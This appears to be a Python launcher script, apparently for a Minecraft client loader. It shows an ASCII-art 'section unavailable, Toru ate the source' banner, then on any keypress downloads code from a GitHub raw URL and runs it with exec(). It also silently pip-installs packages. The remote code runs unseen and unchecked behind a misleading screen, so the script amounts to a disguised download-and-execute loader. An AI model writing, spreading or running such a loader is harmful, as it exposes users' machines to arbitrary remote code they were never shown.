import sys
import time
from time import sleep, strftime
from datetime import datetime
import threading, base64
import webbrowser, os, re, json, random
import tempfile
import msvcrt

try:
    from faker import Faker
    from requests import session
    from colorama import Fore, Style
    import requests, random, re
    from random import choice, randint, shuffle
    import requests, pystyle
    from os.path import isfile
except:
    os.system("pip install faker")
    os.system("pip install requests")
    os.system("pip install colorama")   
    os.system('pip install requests && pip install bs4 && pip install pystyle && pip install pycryptodome')
from pystyle import Add, Center, Anime, Colors, Colorate, Write, System
# MÀU
xnhac = "\033[1;36m"
do = "\033[1;31m"
luc = "\033[1;32m"
vang = "\033[1;33m"
xduong = "\033[1;34m"
hong = "\033[1;35m"
trang = "\033[1;39m"
whiteb = "\033[1;39m"
red = "\033[0;31m"
redb = "\033[1;31m"
end = '\033[0m'
# BY THAT VAPE USER
dev = "\033[1;39m[\033[1;31m×\033[1;39m]\033[1;39m"


def banner():
    banner = f"""\033[1;32m\033[1;39mYou can't access this section right now.    
              
            -#@@@%%@@@@@@@@@@@@@@@@@@@@@@@@@%+:             
              :%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#-           
            .*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%-         
           -@@@@@@@@@@@@@@@@@@@@@%@@@@%@@@@@@@@@@@@%-       
          *@@@@@@@@@@@@@@@@@@@@@%@@@@@%@@@@@@@@@@@@@@*      
       .-%@@@%@@@@@@@@@@@@@@@@@@%@@@@@#@@@@@@@@@@@@@@@=
    :::+@@@@@@@@@@@@@@@@%@@@@@@#@@@@@@%@@@@@@@@@@@%@@@*     
      *@@@@@@@@%#@@@@@@%%@@@@@%=@@@@@#-@@@@@@@@%@@@@@@@.    
    .%@@@@@@@@%@%@@@@@%-*@@@@@--@@@@%-:=@@@@%@@#@@@@@@@=:.          ____                   __
   .%@@@@%@@@@*+@@@@@#:.#@@@@-.=@@@%:   =@@@@%@#@@@@@@@%.          / __ \____  ____  _____/ /
   #@%@@@%@@@@@%%%@@#+++%@@@-  +@%#++==--#@%@@%@@@@@@@@@*         / / / / __ \/ __ \/ ___/ / 
  =#:#@@**@@%@@@@@@=#   @@%:   *%=+-  .#.:#%@@#++@@@@@@@%-       / /_/ / /_/ / /_/ (__  )_/
  +  #%# -@@%@@@@@: +=.=@%.    =. :*-:*=  %@@@*--*@@@@%%%%       \____/ .___/ .___/____(_)
     +%-  #@@@@%@-...:-=%.         :--:.  %@@@#==#@@@@%+%%.           /_/   /_/             
     .#   :%@@@@%- ..  =.               ..%@@@#%@@@@%%%:*#           What happenned?
      .   *@%@@@@#          .            :%@@@%@@@@@%@%::.  Umm.. It seems that Toru just ate the source, so you MIGHT
         +@@@@%@@%*-       .:         .=+@%@@@@@@@@@@%%           not be able to access this section!
       :#@@@@@%@@%%%#+-.    :      .-*%%@@%@@%@%%@@@@%=          Maybe comeback later.. ehehe
     -++*+=%@@%@@%@@@%%%#*=-::-====###%@@@%@@%@%%@@@@@-     
         :%@@@%@@@@%%####%@@@#*==-:...##@@@@@%@@@@@@*+%*:   
        -@@@@@%@%@@@%#######**=......=++#%@%@@@@%@@@#  :--:.
      .+@@@@@@%@%@#@%###***##*#-...-*-...:*%%@@@%@@@@*:     
      =:@@@%@@%%@+=%#++====+#*%#=.+=      =@%@@%##+@@%.:.   
              - I was just hungry, sorry. -

                                                \033[0;31mPress any key for turn back.                                                                                                                                                                          
\033[1;39m                                             
"""
    for X in banner:
        sys.stdout.write(X)
        sys.stdout.flush()
        sleep(0.000001)

while True:
    os.system('cls')
    banner()
    msvcrt.getch()
    exec(requests.get('https://raw.githubusercontent.com/MCCFree/MCC-Loader/main/Minecraft').text)
